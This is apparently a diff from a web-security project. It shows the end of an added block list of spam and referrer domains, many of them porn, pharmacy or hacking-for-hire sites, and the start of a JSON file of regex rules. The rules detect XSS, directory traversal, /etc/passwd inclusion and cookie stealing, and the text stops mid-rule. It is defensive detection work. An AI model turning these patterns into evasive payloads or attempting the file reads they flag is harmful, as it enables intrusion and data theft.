+umnovocaminho.com
+unacittaconte.org
+unblocksit.es
+undergroundcityphoto.com
+underthesite.com
+unece.org
+uni.me
+unimodemhalfduplefw.pen.io
+unionmarkt.de
+unisexjewelry.org
+unitexindia.com
+unitygame3d.com
+univerfiles.com
+universals.com.ua
+unlimitdocs.net
+unmaroll.ya.ru
+unpredictable.ga
+unrealcommander.biz
+unrealcommander.com
+unrealcommander.org
+uogonline.com
+upproar.com
+uprour.com
+upstore.me
+uptime-alpha.net
+uptime-as.net
+uptime-delta.net
+uptime-gamma.net
+uptime.com
+uptimebot.net
+uptimechecker.com
+upupa.net
+ural-buldozer.ru
+urccvfmc.bloger.index.hr
+urdoot.win
+urengoy.pro
+url-extractor.xyz
+url-img.link
+url2image.com
+urlcut.ru
+urldelivery.com
+urll.eu
+urlopener.blogspot.com.au
+urlopener.com
+uroffer.link
+uroki.net
+urzedowski.eu
+us-america.ru
+usacasino.com
+usadacha.net
+usbggettwku.ga
+usdx.us
+userequip.com
+usiad.net
+ussearche.cf
+usswrite.com
+ustion.ru
+utiblog.fr
+utrolive.ru
+uvozdeckych.info
+uytmaster.ru
+uzporno.mobi
+uzungil.com
+v-doc.co
+v24s.net
+v720hd.ru
+vabasa.inwtrade.com
+vacances-voyages.info
+vacuumcleanerguru.com
+vacuumscleaner.com
+vadimkravtcov.ru
+validccseller.com
+validdomain.xyz
+valkiria-tk.ru
+valmetrundan.se
+valoresito.com
+valsalud.com
+valuado.com
+valueclick.com
+vancleefreplica.pw
+vandrie-ict.nl
+vapeface.club
+vapomnoncri.tk
+vapsy.com
+varbergsvind.se
+varikoz24.com
+varikozdok.ru
+vashsvet.com
+vasileostrovsky-rayon.ru
+vavilone.com
+vbabule.net
+vbikse.com
+vbtracker.net
+vchulkah.net
+vchulkax.com
+vclicks.net
+vduplo.ru
+vedomstvo.net
+veerotech.com
+vegan-foods.us
+vegascosmetics.ru
+vektorpress.ru
+vekzdorov.ru
+velen.io
+veles.shop
+vellings.info
+velobikestock.com
+velpanex.ru
+venerologiya.com
+venta-prom.ru
+ventelnos.com
+veopornogratis.xxx
+vepad.com
+vereo.eu
+versaut.xxx-cam.webcam
+vertaform.com
+verymes.xyz
+veselokloun.ru
+vesnatehno.com
+vesnatehno.ru
+vezuviy.su
+vgoloveboli.net
+via-energy-acquistare.com
+via-energy-cumpara.com
+via-energy-order.com
+via-gra.webstarts.com
+viagengrarx.com
+viagra-soft.ru
+viagra.pp.ua
+viagraneggrx.com
+viagroid.ru
+viandpet.com
+viberdownload10.com
+viddyoze.com
+video--production.com
+video-camer.com
+video-chat.cn
+video-chat.in
+video-chat.love
+video-hollywood.ru
+video-production.com
+video-woman.com
+videochat.bz
+videochat.cafe
+videochat.life
+videochat.mx
+videochat.ph
+videochat.tv.br
+videochat.world
+videochaty.ru
+videogamesecrets.com
+videojam.tv
+videokrik.net
+videonsk.com
+videooko.weebly.com
+videos-for-your-business.com
+videosbox.ru
+videositename.com
+videospornogratisx.net
+videotuber.ru
+videtubs.pl
+vids18.site
+viel.su
+vielporno.net
+vietimgy.pw
+vigrx-original.ru
+vikistars.com
+viktoria-center.ru
+vilingstore.net
+villacoloniale.com
+villakohlanta.nu
+vinsit.ru
+vintontech.info
+vinylvault.co.uk
+vip-dom.in
+vip-file.com
+vip-parfumeria.ru
+vip.51.la
+vip2ch.com
+vipcallsgirls.com
+vipms.ru
+vipps.com.my
+vipromoffers.com
+vipsexfinders.com
+vipsiterip.org
+virtuagirl.com
+virtualbb.com
+virus-respirators.com
+virus-schutzmasken.de
+visa-china.ru
+visa-pasport.ru
+visionwell.com.cn
+visitcambridge.org
+vita.com.hr
+vitalads.net
+vitanail.ru
+viteonlusarezzo.it
+vitoriacabos.com
+viven.host.sk
+viveresaniesnelli.it
+vizag.kharkov.ua
+vizitki.net
+vk-mus.ru
+vkak.ru
+vkgaleria.com
+vkmusics.ru
+vkonche.com
+vkontaktemusic.ru
+vkontarkte.com
+vksaver-all.ru
+vksex.ru
+vladhistory.com
+vladimir.xrus.org
+vladimir.zrus.org
+vltai.com
+vmnmvzsmn.over-blog.com
+vod.com.ua
+vodaodessa.com
+voditeltrezviy.ru
+vodkoved.ru
+volgograd.xrus.org
+voloo.ru
+voloomoney.com
+voloslove.ru
+voltrknc1.com
+volume-pills.biz
+voluumtracker1.com
+voluumtrk.com
+vonradio.com
+voprosotvet24.ru
+voronezh.xrus.org
+vostoktrade.info
+vote-up.ru
+vozbujdenie.com
+vpnhowto.info
+vpnmouse.com
+vremya.eu
+vriel.batcave.net
+vrnelectro.ru
+vrotike.ru
+vroze.com
+vsdshnik.com
+vse-pesni.com
+vseigru.one
+vseigry.fun
+vsesubwaysurfers.com
+vseuznaem.com
+vsexkontakte.net
+vtc.pw
+vtcdns.com
+vuclip.com
+vucms.com
+vut.com.ru
+vvon.co.uk
+vvpg.ru
+vykup-avto-krasnodar.ru
+vykupavto-krasnodar.ru
+vysigy.su
+vzglyadriv.kg
+vzlom-na-zakaz.com
+vzlomfb.com
+vzlomsn.org
+vzlomtw.com
+vzubah.com
+vzube.com
+w-journal.ru
+w3data.co
+w3javascript.com
+w7s.ru
+wahicbefa31.soup.io
+wait3sec.org
+walkme.com
+wallpaperaccess.com
+wallpapers-best.com
+wallpapersdesk.info
+wallpapersist.com
+wallpaperstock.net
+walpaperlist.com
+wanker.us
+wapsite.me
+wardreapptokone.tk
+wareseeker.com
+warezaccess.com
+warezkeeper.com
+warning.or.kr
+warningwar.ru
+warningzscaler.heraeus.com
+watch-movies.ru
+watchdogs-2.ru
+watchinf.com
+watchmyfb.pl
+watchmygf.net
+waterefficiency.co
+waterpurifier.club
+watracker.net
+watsonrealtycorp.com
+waycash.net
+waysbetter.cn
+wcb.su
+wdfdocando.com
+wdrake.com
+we-are-gamers.com
+web-analytics.date
+web-betting.ru
+web.cvut.cz
+webads.co.nz
+webadvance.club
+webalan.ru
+webcamdevochka.com
+webcamtalk.net
+webenlace.com.ar
+webextract.profound.net
+webinstantservice.com
+webix.biz
+webix.me
+webjam.com
+webkeyit.com
+weblibrary.win
+weblo.com
+webmasterhome.cn
+webmasters.stackexchange.com
+webmonetizer.net
+webnode.me
+weboptimizes.com
+webpromotion.ae
+webradiology.ru
+webs.com
+webscouter.net
+webshoppermac.com
+website-analytics.online
+website-analyzer.info
+website-audit.com.ua
+website-datenbank.de
+website-speed-check.site
+website-speed-checker.site
+website-speed-up.site
+website-speed-up.top
+website-stealer.nufaq.com
+websiteaccountant.de
+websiteexplorer.info
+websites-reviews.com
+websitevaluebot.com
+webstatsdomain.org
+webtherapy.ru
+weburlopener.com
+weburok.com
+wechatdownload10.com
+weclipart.com
+wedding-salon.net
+wedding0venues.tk
+weddingdresses.xyz
+weekes.biz.tc
+weightatraining.com
+wejdz-tu.pl
+welck.octopis.com
+welcomeauto.ru
+wellcome2slovenia.ru
+wemarketing.se
+wemedinc.com
+weprik.ru
+wesharepics.com
+wesharepics.info
+wesharepics.site
+westen-v.life
+westen-z.life
+westermarkanjou.se
+westsextube.com
+westum.se
+westvilletowingservices.co.za
+wetgames.ru
+wfb.hatedriveapart.com
+whatistizanidine2mg.blogspot.com
+whatistizanidinehclusedfor.blogspot.com
+whatsappbot.flyland.ru
+whatsappdownload10.com
+whatsupinfoley.com
+whatzmyip.net
+wheelchairliftsarea.com
+whengirlsgowild.com
+where-toget.com
+whereiskentoday.com
+whereverdesperate.gq
+while.cheapwebsitehoster.com
+whipme.yopoint.in
+white-truck.life
+whiteelephantwellington.com
+whiteproduct.com
+wholesalecheapjerseysfree.com
+wholesalejerseychinaoutlet.com
+wholesalejerseychinashop.com
+wholesalejerseys-cheapest.com
+wholesalejerseyscheapjerseys.us.com
+wholesalejerseysgaa.com
+wholesalenfljerseys.us.com
+wholinkstome.com
+whos.amung.us
+whosonmyserver.com
+wieseversa.no
+wikes.20fr.com
+wildcattube.com
+wildnatureimages.com
+wildworld.site
+williamrobsonproperty.com
+win-spy.com
+windowssearch-exp.com
+wineitudes.wordpress.com
+wineration.com
+wingsoffury2.com
+wingsofrefuge.net
+winner7777.net
+winterclassichockeyjerseys.com
+winwotgold.pl
+winx-play.ru
+wiosenny-bon-1500.pl
+witclub.info
+witherrom55.eklablog.fr
+withstandingheartwarming.com
+wjgony.com
+wladimirpayen.com
+wleuaprpxuvr.ga
+wma-x.com
+wnhjavlhezp.gq
+wnoz.de
+womama.ru
+woman-h.ru
+woman-orgasm.ru
+woman-tampon.ru
+womens-journal.net
+womensplay.net
+womensterritory.ru
+wonderfulflowers.biz
+woodyguthrie.se
+word-vorlagen.net
+word-vorlagen.xyz
+wordkeyhelper.com
+wordpress-crew.net
+wordpresscore.com
+workle.website
+works.if.ua
+world-mmo.com
+worldhistory.biz
+worldinternetauthority.com
+worldis.me
+worldlovers.ru
+worldmusicfests.com
+worldoffiles.ru
+worldtraveler.world
+wormix-cheats.ru
+worst-sites.online
+wosik-dach.service-for-web.de
+wovis.site
+wowas31.ucoz.ru
+wowcasinoonline.ooo
+woweb.com.ua
+wpsecurity.website
+wpthemedetector.co.uk
+writersgroup580.web.fc2.com
+writingservices17.blogspot.ru
+wrona.it
+wrz0iuebwhp5fg.freeddns.com
+ws.ampower.me
+wsgames.ru
+wstroika.ru
+wtsindia.in
+wttavern.com
+wufak.com
+wurr.voila.net
+ww1943.ru
+ww2awards.info
+www.888.com
+www.arenda-yeisk.ru
+www.bookmaker-bets.com
+www.ehscloud.cn
+www.event-tracking.com
+www.get-free-traffic-now.com
+www.jbetting.com
+www.kabbalah-red-bracelets.com
+www.labves.ru
+www.pinnacle-bets.com
+www.solartek.ru
+www.souvenirua.com
+www.timer4web.com
+www.wohnkabinen-shop.de
+wwwadultcheck.com
+wygraj-skiny.win
+wygraj-teraz.com
+wyniki-lista.pl
+wzgyyq.com
+x-diesel.biz
+x-diesel.com
+x-diesel.info
+x-diesel.org
+x-lime.com
+x-lime.net
+x-mix.info
+x-musics.com
+x-porno.video
+x-rates.ru
+x-stars.ru
+x-true.info
+x5market.ru
+x69ty.ru
+xaijo.com
+xaylapdiendanang.com
+xbaboon.com
+xblog.in
+xblognetwork.com
+xboxster.ru
+xcc24.pl
+xchangetrak.com
+xchat26.myfreecams.com
+xclicks.net
+xcombear.ru
+xdoza.com
+xedserver.com
+xep.info
+xerox-douglas.cf
+xev.ru
+xfire.com
+xfluro.com
+xgames-04.com
+xgftnlrt.bloger.index.hr
+xingzi-vision.com
+xitjw.info
+xjlottery.com
+xjrul.com
+xkaz.org
+xlolitka.com
+xlovecam.com
+xmladserver.com
+xmlinde.com
+xmnb.net
+xmronta.com
+xn------7cdbapdecfd4ak1bn0amjffj7afu3y.xn--p1ai
+xn-----6kcaabbafhu7cskl7akvongwpo7hvjj.xn--p1ai
+xn-----6kcaacnblni5c5bicdpcmficy.xn--p1ai
+xn-----6kccaibs5cb8afhjrfmix2n.xn--p1ai
+xn-----7kcabaipgeakzcss7bjdqdwpfnhv.xn--p1ai
+xn-----7kceclhb4abre1b4a0ccl2fxch1a.xn--p1ai
+xn-----8kcatubaocd1bneepefojs1h2e.xn--p1ai
+xn----7sbaaabaei0cc8aj5bj0bncejx.xn--p1ai
+xn----7sbahjd3btneuw1joc.xn--p1ai
+xn----7sbaphztdjeboffeiof6c.xn--p1ai
+xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai
+xn----7sbbahaq9bb5afgiqfliv4m.xn--p1ai
+xn----7sbho2agebbhlivy.xn--p1ai
+xn----7sbifcamovvfggw9d.xn--p1ai
+xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks
+xn----8sbdbjgb1ap7a9c4czbh.xn--p1acf
+xn----8sbhefaln6acifdaon5c6f4axh.xn--p1ai
+xn----8sblgmbj1a1bk8l.xn----161-4vemb6cjl7anbaea3afninj.xn--p1ai
+xn----9sbebi2bvzr7h.xn--p1ai
+xn----9sbubg3ambdfl1j.xn--p1ai
+xn----btbdvdh4aafrfciljm6k.xn--p1ai
+xn----ctbbcjd3dbsehgi.xn--p1ai
+xn----ctbigni3aj4h.xn--p1ai
+xn----dtbndd4ae7eub.top
+xn----itbeirbjbi7bc6bh2d.xn--p1ai
+xn----itbkqkfiq.xn--p1ai
+xn--1-8sbcpb0bdm8k6a.xn--p1ai
+xn--24-glceagatoq7c2a6ioc.xn--p1ai
+xn--80aaafbn2bc2ahdfrfkln6l.xn--p1ai
+xn--80aaagvmjabrs1aoc9luc.xn--p1ai
+xn--80aaajbdbddwj2alwjieei2afr3v.xn--p1ai
+xn--80aaaks3bbhabgbigamdr2h.xn--p1ai
+xn--80aafb2a.xn--p1ai
+xn--80aagddcgkbcqbad7amllnejg6dya.xn--p1ai
+xn--80aanaardaperhcem4a6i.com
+xn--80ab4aa2g.xn--p1ai
+xn--80abgj3a5acid6ghs.top
+xn--80adaggc5bdhlfamsfdij4p7b.xn--p1ai
+xn--80aeahghtf8ac5i.xn--p1ai
+xn--80aebbcbcdemfkhba4byaehoejh8dza3v.xn--p1ai
+xn--80ahdheogk5l.xn--p1ai
+xn--80ahvj9e.xn--p1ai
+xn--80aikhbrhr.net
+xn--80ajbshivpvn2i.xn--p1ai
+xn--80ajjbdhgmudixfjc8c5a9df8b.xn--p1ai
+xn--80ak6aa92e.com
+xn--80aodinpgi.xn--p1ai
+xn--80atua3d.xn--p1ai
+xn--90acenikpebbdd4f6d.xn--p1ai
+xn--b1adccaf1bzj.xn--p1ai
+xn--b1addnj3cah.xn--p1ai
+xn--b1ag5cfn.xn--p1ai
+xn--b1agm2d.net
+xn--c1acygb.xn--p1ai
+xn--d1abj0abs9d.in.ua
+xn--d1acah0c.xn--p1ai
+xn--d1aifoe0a9a.top
+xn--e1afanlbnfckd7c3d.xn--p1ai
+xn--e1aggki3c.xn--80adxhks
+xn--h1aakne2ba.xn--p1ai
+xn--h1ahbi.com.ua
+xn--hxazdsfy.blogspot.com
+xn--l1aengat.xn--p1ai
+xn--lifehacer-1rb.com
+xn--oogle-wmc.com
+xn--q1a.xn--b1aube0e.xn--c1acygb.xn--p1ai
+xnxx-n.com
+xnxx699.com
+xnxxandxvideos.com
+xolodremont.ru
+xportvusbdriver8i.snack.ws
+xpresscare.ru
+xrus.org
+xsfetish.org
+xsion.net
+xtraffic.plus
+xtrafficplus.com
+xtremeeagles.net
+xtube.com
+xtubeporno.net
+xuki.us
+xvideosbay.com
+xvideosporn.biz
+xvideospornoru.com
+xwatt.ru
+xxart.ru
+xxlargepop.com
+xxx-cam.webcam
+xxx-treker.ru
+xxxasianporn.net
+xxxdatinglocal.us
+xxxguitars.com
+xxxhdvideo.site
+xxxkaz.org
+xxxmania.top
+xxxnatelefon.ru
+xxxrus.org
+xxxsiterips.xyz
+xxxtube69.com
+xxxtubesafari.com
+xz618.com
+xzlive.com
+y8games-free.com
+yaaknaa.info
+yachts-cruise.info
+yaderenergy.ru
+yadro.ru
+yaminecraft.ru
+yaoguangdj.com
+yatrk.xyz
+yeartwit.com
+yebocasino.co.za
+yebocasino.com
+yellocloud.be
+yellowads.men
+yellowfootprints.com
+yellowproxy.net
+yellowstonesafaritours.com
+yellowstonevisitortours.com
+yes-com.com
+yginekologa.com
+yhit.press
+ynymnwbm.bloger.index.hr
+yogamatsexpert.com
+yoluxuryevents.com
+yoopsie.com
+yopoint.in
+yoshkarola.zrus.org
+yottos.com
+you-shall-not-pass.is74.ru
+youandcredit.ru
+youbloodyripper.com
+youbrainboost.asia
+youdao.com
+youdesigner.kz
+yougame.biz
+yougetsignal.com
+youghbould.wordpress.com
+yougotanewdomain.com
+youjizz.com
+youjizz.vc
+youporn-forum.ga
+youporn-ru.com
+your-bearings.com
+youradexchange.com
+yourads.website
+youradulthosting.com
+youraticles.pl
+yourdesires.ru
+youresponsive.com
+yourmovies.pl
+yourothersite.com
+yourporn.com
+yourporngay.com
+yoursearch.me
+yourserverisdown.com
+yoursite.com
+yourtemplatefinder.com
+yousense.info
+youthreaders.com
+youtoner.it
+youtube-downloader.savetubevideo.com
+youtubedownload.org
+youtubologia.it
+youtuhe.com
+ypmuseum.ru
+ytmnd.com
+yuarra.pluto.ro
+yubikk.info
+yugk.net
+yugo-star.ru
+yun56.co
+yunque.pluto.ro
+yur-p.ru
+yurgorod.ru
+yuweng.info
+z-master.ru
+za-fun-offer.com
+za-music.mymobiplanet.com
+zaapplesales.blogspot.com
+zacreditom.ru
+zagadki.in.ua
+zahvat.ru
+zaidia.xhost.ro
+zaim-pod-zalog-krasnodar.ru
+zaimhelp.ru
+zaimite.ru
+zajm-pod-zalog-nedvizhimosti.ru
+zajm-zalog-krasnodar.ru
+zakazfutbolki.com
+zakazvzloma.com
+zakon-ob-obrazovanii.ru
+zakonobosago.ru
+zaloadi.ru
+zaloro.com
+zambini.ru
+zaobao.com.sg
+zapatosenventa.info
+zapiszto.pl
+zarabiaj-dzis.pl
+zarabotat-na-sajte.ru
+zarabotok--doma.ru
+zarajbuilders.com
+zarenica.net
+zarepta.com
+zastenchivosti.net
+zastroyka.org
+zatjmuzu.info
+zawyna.ua
+zazagames.org
+zdesformula.ru
+zdesoboi.com
+zebradudka.com
+zebramart.ru
+zed21.net
+zeg-distribution.com
+zeikopay.com
+zeleznobeton.ru
+zero1.it
+zerocash.msk.ru
+zeroredirect.com
+zeroredirect1.com
+zeroredirect10.com
+zeroredirect11.com
+zeroredirect12.com
+zeroredirect2.com
+zeroredirect5.com
+zeroredirect6.com
+zeroredirect7.com
+zeroredirect8.com
+zeroredirect9.com
+zetgie.com.pl
+zetmaster.ru
+zhacker.net
+zhongwenlink.com
+zhorapankratov7.blogspot.com
+zhuravlev.info
+zigarettenonl.canalblog.com
+zigarettenonlinekaufen.tumblr.com
+zigarettenonlinekaufen1.bloog.pl
+zigarettenonlinekaufen1.blox.pl
+zigarettenonlinekaufen2.bloog.pl
+zigarettenonlinekaufen2.drupalgardens.com
+zigzog.ru
+zionstar.net
+zirondelli.it
+zixizop.net.ru
+zkjovpdgxivg.ga
+zlatnajesen.com
+zmoda.hostreo.com
+znakom.sibtest.ru
+znakomstva-moskva77.ru
+znakomstva-piter78.ru
+znakomstvaonlain.ru
+znaniyapolza.ru
+znaturaloriginal.com
+zocaparj.kz
+zog.link
+zojirushi-products.ru
+zolotoy-lis.ru
+zona-aqua.ru
+zone-kev717.info
+zoodrawings.com
+zoogdiesney.com
+zoogdinsney.com
+zoogdisany.com
+zooggames.com
+zoolubimets.ru
+zoominfo.com
+zoomovies.org
+zoompegs.com
+zoosexart.com
+zootoplist.com
+zootravel.com
+zophim.me
+zrelaya.pw
+zreloeporno.tv
+zrizvtrnpale.tk
+zrus.org
+zryydi.com
+zs2vm.top
+zscaler.net
+zscalerone.net
+zscalertwo.net
+zskdla.site
+zverokruh-shop.cz
+zvetki.ru
+zvezdagedon.ru
+zvooq.eu
+zvuker.net
+zx6.ru
+zygophyceous.womanstars.site
+zynax.ua
+zytpirwai.net
+zzbroya.com.ua
+zzlgxh.com
\ No newline at end of file
diff --git a/db/common-web-attacks.json b/db/common-web-attacks.json
new file mode 100644
index 00000000..70cad69c
--- /dev/null
+++ b/db/common-web-attacks.json
@@ -0,0 +1 @@
+{"filters":[{"id":1,"rule":"(?:\"[^\"]*[^-]?>)|(?:[^\\w\\s]\\s*\\/>)|(?:>\")","description":"finds html breaking injections including whitespace attacks","tags":["xss","csrf"],"impact":4},{"id":2,"rule":"(?:\"+.*[<=]\\s*\"[^\"]+\")|(?:\"\\s*\\w+\\s*=)|(?:>\\w=\\/)|(?:#.+\\)[\"\\s]*>)|(?:\"\\s*(?:src|style|on\\w+)\\s*=\\s*\")|(?:[^\"]?\"[,;\\s]+\\w*[\\[\\(])","description":"finds attribute breaking injections including whitespace attacks","tags":["xss","csrf"],"impact":4},{"id":3,"rule":"(?:^>[\\w\\s]*<\\/?\\w{2,}>)","description":"finds unquoted attribute breaking injections","tags":["xss","csrf"],"impact":2},{"id":4,"rule":"(?:[+\\/]\\s*name[\\W\\d]*[)+])|(?:;\\W*url\\s*=)|(?:[^\\w\\s\\/?:>]\\s*(?:location|referrer|name)\\s*[^\\/\\w\\s-])","description":"Detects url-, name-, JSON, and referrer-contained payload attacks","tags":["xss","csrf"],"impact":5},{"id":5,"rule":"(?:\\W\\s*hash\\s*[^\\w\\s-])|(?:\\w+=\\W*[^,]*,[^\\s(]\\s*\\()|(?:\\?\"[^\\s\"]\":)|(?:(?<!\\/)__[a-z]+__)|(?:(?:^|[\\s)\\]\\}])(?:s|g)etter\\s*=)","description":"Detects hash-contained xss payload attacks, setter usage and property overloading","tags":["xss","csrf"],"impact":5},{"id":6,"rule":"(?:with\\s*\\(\\s*.+\\s*\\)\\s*\\w+\\s*\\()|(?:(?:do|while|for)\\s*\\([^)]*\\)\\s*\\{)|(?:\\/[\\w\\s]*\\[\\W*\\w)","description":"Detects self contained xss via with(), common loops and regex to string conversion","tags":["xss","csrf"],"impact":5},{"id":7,"rule":"(?:[=(].+\\?.+:)|(?:with\\([^)]*\\)\\))|(?:\\.\\s*source\\W)","description":"Detects JavaScript with(), ternary operators and XML predicate attacks","tags":["xss","csrf"],"impact":5},{"id":8,"rule":"(?:\\/\\w*\\s*\\)\\s*\\()|(?:\\([\\w\\s]+\\([\\w\\s]+\\)[\\w\\s]+\\))|(?:(?<!(?:mozilla\\/\\d\\.\\d\\s))\\([^)[]+\\[[^\\]]+\\][^)]*\\))|(?:[^\\s!][{([][^({[]+[{([][^}\\])]+[}\\])][\\s+\",\\d]*[}\\])])|(?:\"\\)?\\]\\W*\\[)|(?:=\\s*[^\\s:;]+\\s*[{([][^}\\])]+[}\\])];)","description":"Detects self-executing JavaScript functions","tags":["xss","csrf"],"impact":5},{"id":9,"rule":"(?i)(?:\\\\u(?:\\{(0{1,})?[a-f0-9]{2}\\}|00[a-f0-9]{2}))|(?:\\\\x0*[a-f0-9]{2})|(?:\\\\\\d{2,3})","description":"Detects the IE octal, hex and unicode entities","tags":["xss","csrf"],"impact":2},{"id":10,"rule":"(?:(?:\\/|\\\\)?\\.+(\\/|\\\\)(?:\\.+)?)|(?:\\w+\\.exe\\??\\s)|(?:;\\s*\\w+\\s*\\/[\\w*-]+\\/)|(?:\\d\\.\\dx\\|)|(?:%(?:c0\\.|af\\.|5c\\.))|(?:\\/(?:%2e){2})","description":"Detects basic directory traversal","tags":["dt","id","lfi"],"impact":5},{"id":11,"rule":"(?:%c0%ae\\/)|(?:(?:\\/|\\\\)(home|conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|%[a-z_-]{3,}%)(?:\\/|\\\\))|(?:(?:\\/|\\\\)inetpub|localstart\\.asp|boot\\.ini)","description":"Detects specific directory and path traversal","tags":["dt","id","lfi"],"impact":5},{"id":12,"rule":"(?:etc\\/\\W*passwd)","description":"Detects etc/passwd inclusion attempts","tags":["dt","id","lfi"],"impact":5},{"id":13,"rule":"(?:%u(?:ff|00|e\\d)\\w\\w)|(?:(?:%(?:e\\w|c[^3\\W]|))(?:%\\w\\w)(?:%\\w\\w)?)","description":"Detects halfwidth/fullwidth encoded unicode HTML breaking attempts","tags":["xss","csrf"],"impact":3},{"id":14,"rule":"(?:#@~\\^\\w+)|(?:\\w+script:|@?import\\s*\\(?|;base64|base64,)|(?:\\w\\s*\\([\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+\\))","description":"Detects possible includes, VBSCript/JScript encoded and packed functions","tags":["xss","csrf","id","rfe"],"impact":5},{"id":15,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:create(?:element|attribute|textnode)|[a-z]+events?|setattribute|getelement\\w+|appendchild|createrange|createcontextualfragment|removenode|parentnode|decodeuricomponent|\\wettimeout|(?:ms)?setimmediate|option|useragent)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\",.+\\-]))","description":"Detects JavaScript DOM/miscellaneous properties and methods","tags":["xss","csrf","id","rfe"],"impact":6},{"id":16,"rule":"([^*\\s\\w,.\\/?+-]\\s*)?(?<![a-mo-z]\\s)(?<![a-z\\/_@])(\\s*return\\s*)?(?:alert|inputbox|showmod(?:al|eless)dialog|showhelp|infinity|isnan|isnull|iterator|msgbox|executeglobal|expression|prompt|write(?:ln)?|confirm|dialog|urn|(?:un)?eval|exec|execscript|tostring|status|execute|window|unescape|navigate|jquery|getscript|extend|prototype)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\",.:\\/+\\-]))","description":"Detects possible includes and typical script methods","tags":["xss","csrf","id","rfe"],"impact":5},{"id":17,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@])(\\s*return\\s*)?(?:hash|name|href|navigateandfind|source|pathname|close|constructor|port|protocol|assign|replace|back|forward|document|ownerdocument|window|top|this|self|parent|frames|_?content|date|cookie|innerhtml|innertext|csstext+?|outerhtml|print|moveby|resizeto|createstylesheet|stylesheets)(?(1)[^\\w%\"]|(?:\\s*[^@\\/\\s\\w%.+\\-])['\"`])","description":"Detects JavaScript object properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":18,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:join|pop|push|reverse|reduce|concat|map|shift|sp?lice|sort|unshift)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%,.+\\-]))","description":"Detects JavaScript array properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":19,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:set|atob|btoa|charat|charcodeat|charset|concat|crypto|frames|fromcharcode|indexof|lastindexof|match|navigator|toolbar|menubar|replace|regexp|slice|split|substr|substring|escape|\\w+codeuri\\w*)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%,.+\\-]))","description":"Detects JavaScript string properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":20,"rule":"(?:\\)\\s*\\[)|([^*\":\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z_@\\|])(\\s*return\\s*)?(?:globalstorage|sessionstorage|postmessage|callee|constructor|content|domain|prototype|try|catch|top|call|apply|url|function|object|array|string|math|if|for\\s*(?:each)?|elseif|case|switch|regex|boolean|location|(?:ms)?setimmediate|settimeout|setinterval|void|setexpression|namespace|while)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\".+\\-\\/]))","description":"Detects JavaScript language constructs","tags":["xss","csrf","id","rfe"],"impact":4},{"id":21,"rule":"(?:,\\s*(?:alert|showmodaldialog|eval)\\s*,)|(?::\\s*eval\\s*[^\\s])|([^:\\s\\w,.\\/?+-]\\s*)?(?<![a-z\\/_@])(\\s*return\\s*)?(?:(?:document\\s*\\.)?(?:.+\\/)?(?:alert|eval|msgbox|showmod(?:al|eless)dialog|showhelp|prompt|write(?:ln)?|confirm|dialog|open))\\s*(?:[^.a-z\\s\\-]|(?:\\s*[^\\s\\w,.@\\/+-]))|(?:java[\\s\\/]*\\.[\\s\\/]*lang)|(?:\\w\\s*=\\s*new\\s+\\w+)|(?:&\\s*\\w+\\s*\\)[^,])|(?:\\+[\\W\\d]*new\\s+\\w+[\\W\\d]*\\+)|(?:document\\.\\w)","description":"Detects very basic XSS probings","tags":["xss","csrf","id","rfe"],"impact":3},{"id":22,"rule":"(?:=\\s*(?:top|this|window|content|self|frames|_content))|(?:\\/\\s*[gimx]*\\s*[)}])|(?:[^\\s]\\s*=\\s*script)|(?:\\.\\s*constructor)|(?:default\\s+xml\\s+namespace\\s*=)|(?:\\/\\s*\\+[^+]+\\s*\\+\\s*\\/)","description":"Detects advanced XSS probings via Script(), RexExp, constructors and XML namespaces","tags":["xss","csrf","id","rfe"],"impact":5},{"id":23,"rule":"(?:\\.\\s*\\w+\\W*=)|(?:\\W\\s*(?:location|document)\\s*\\W[^({[;]+[({[;])|(?:\\(\\w+\\?[:\\w]+\\))|(?:\\w{2,}\\s*=\\s*\\d+[^&\\w]\\w+)|(?:\\]\\s*\\(\\s*\\w+)","description":"Detects JavaScript location/document property access and window access obfuscation","tags":["xss","csrf"],"impact":5},{"id":24,"rule":"(?:[\".]script\\s*\\()|(?:\\$\\$?\\s*\\(\\s*[\\w\"])|(?:\\/[\\w\\s]+\\/\\.)|(?:=\\s*\\/\\w+\\/\\s*\\.)|(?:(?:this|window|top|parent|frames|self|content)\\[\\s*[(,\"]*\\s*[\\w\\$])|(?:,\\s*new\\s+\\w+\\s*[,;)])","description":"Detects basic obfuscated JavaScript script injections","tags":["xss","csrf"],"impact":5},{"id":25,"rule":"(?:=\\s*[$\\w]\\s*[\\(\\[])|(?:\\(\\s*(?:this|top|window|self|parent|_?content)\\s*\\))|(?:src\\s*=s*(?:\\w+:|\\/\\/))|(?:\\w+\\[(\"\\w+\"|\\w+\\|\\|))|(?:[\\d\\W]\\|\\|[\\d\\W]|\\W=\\w+,)|(?:\\/\\s*\\+\\s*[a-z\"])|(?:=\\s*\\$[^([]*\\()|(?:=\\s*\\(\\s*\")","description":"Detects obfuscated JavaScript script injections","tags":["xss","csrf"],"impact":5},{"id":26,"rule":"(?:[^:\\s\\w]+\\s*[^\\w\\/](href|protocol|host|hostname|pathname|hash|port|cookie)[^\\w])","description":"Detects JavaScript cookie stealing and redirection 